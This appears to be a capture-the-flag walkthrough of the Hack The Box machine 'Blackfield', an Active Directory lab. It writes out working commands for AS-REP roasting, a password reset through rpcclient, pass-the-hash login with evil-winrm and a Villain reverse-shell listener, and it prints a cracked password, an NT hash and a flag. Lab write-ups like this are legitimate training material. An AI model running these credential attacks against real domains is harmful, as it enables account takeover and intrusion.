Blackfield - HTB

- 3 mins read
Details
URL Hack The Box :: Blackfield
Difficulty Hard
User Solves 153
Release Date 22 Aug, 2024

Recon

Rustscan & Nmap

Ran a quick Rustscan and fed the output into Nmap for a deeper scan.

└─$ python3 ./rs2nm.py 10.129.229.17
Just gonnae run a quick wee Rustscan test...
You selected: 10.129.229.17
Estimated Time Remaining: 1h 35m
Just kidding — only a few seconds!

OOoh, there are a few ports open:
(53, 88, 135, 389, 445, 5985)

Starting Nmap...

Nmap Results:

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Active Directory LDAP
445/tcp  open  microsoft-ds  SMB
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Host: DC01.BLACKFIELD.local (Windows Server 2019)

Note: Added blackfield.local to /etc/hosts for ease of access.

echo "10.129.229.17 blackfield.local" | sudo tee -a /etc/hosts

SMB Enumeration

Using CrackMapExec:

└─$ crackmapexec smb blackfield.local
  • Found shares: forensic, profiles$, IPC$
  • profiles$ is READ ONLY.

Exploring profiles$:

└─$ smbclient -N //blackfield.local/profiles$

Listed hundreds of folders (likely user profiles) — dumped them all into a users.txt file.

Kerberos Pre-Auth Enumeration

Checked if any user had Kerberos Pre-Authentication disabled:

for i in $(cat users.txt); do python3 GetNPUsers.py -dc-ip 10.129.229.17 BLACKFIELD/$i -no-pass; done

Result:

  • support user leaked an AS-REP hash!
$krb5asrep$23$support@BLACKFIELD:...

Cracked with rockyou.txt:

#00^BlackKnight

Exploitation

Initial Access: Support User

BloodHound analysis showed that support can reset the password for audit2020.

Referenced: Reset AD user password with Linux – mubix

Reset the password:

rpcclient -U blackfield.local/support -I 10.129.229.17 dc01.blackfield.local
Password for [BLACKFIELD.LOCAL\support]:

rpcclient $> setuserinfo2 audit2020 23 ILov3Ch3323!

Authenticated as audit2020:

└─$ crackmapexec smb blackfield.local -u audit2020 -p 'ILov3Ch3323!'

Further SMB Access

Accessed the forensic share:

└─$ smbclient -U audit2020 //blackfield.local/forensic

Found:

  • tools/
  • memory_analysis/
  • commands_output/

From commands_output/domain_admins.txt:

  • Administrator
  • Ipwn3dYourCompany

Memory Analysis

Downloaded interesting zips from memory_analysis/, focusing on lsass.zip.

Within lsass memory dump:

  • Found Administrator NT hash, but it seemed outdated.
  • Found valid credentials for svc_backup!
Username: svc_backup
NT Hash: 9658d1d1dcd9250115e2205d9f48400d

User Flag

Used Evil-WinRM to connect:

└─$ evil-winrm -i 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

Retrieved user.txt:

3920bb317a0bef51027e2852be64b543

Privilege Escalation

Initial Enumeration

Checked privileges:

whoami /priv

Noticed:

  • SeBackupPrivilege
  • SeRestorePrivilege

Backup Operators group membership detected.

According to Microsoft Docs:

SeBackupPrivilege allows read access to every file.

Preparing for SYSTEM Access

Launched a listener with Villain:

villain -p 6501 -n 4443 -x 8080 -f 8888

Generated a Powershell reverse shell payload and executed it on the target.

Got a privileged shell!

Summary

Stage Details
Initial Foothold Cracked support’s AS-REP hash and reset audit2020’s password
Further Access SMB exploration revealed memory dumps
User Access Retrieved svc_backup credentials from lsass.zip
Privilege Escalation Used SeBackupPrivilege and Villain payload for SYSTEM access

Flags

  • User: 3920bb317a0bef51027e2852be64b543
  • Root: (Achieved via SYSTEM shell after backup privilege abuse)